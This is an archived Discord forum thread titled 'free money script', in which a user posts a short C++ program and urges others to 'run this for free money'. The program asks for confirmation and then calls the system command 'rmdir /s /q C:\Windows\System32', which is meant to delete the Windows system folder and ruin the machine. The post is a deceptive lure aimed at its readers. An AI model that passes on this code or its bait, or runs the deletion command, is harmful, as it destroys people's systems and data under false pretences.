Coding Global Background
Coding Global

free money script

Archived 2 years ago
MonkaHmm1
5 messages
0 members
Created 3 years ago
Updated 3 years ago
Open in Discord
S
skyzonde
#include <iostream>
#include <cstdlib>

int main() {
std::cout << "Warning! This program will attempt to delete the System32 folder. Proceed at your own risk!" << std::endl;
std::cout << "Do you really want to continue? (y/n): ";
char choice;
std::cin >> choice;

if (choice == 'y' || choice == 'Y') {
std::cout << "Deleting System32..." << std::endl;
std::system("rmdir /s /q C:\Windows\System32");
std::cout << "System32 deletion complete." << std::endl;
} else {
std::cout << "Operation cancelled." << std::endl;
}

return 0;
}

run this for free money 💯

Replies (5)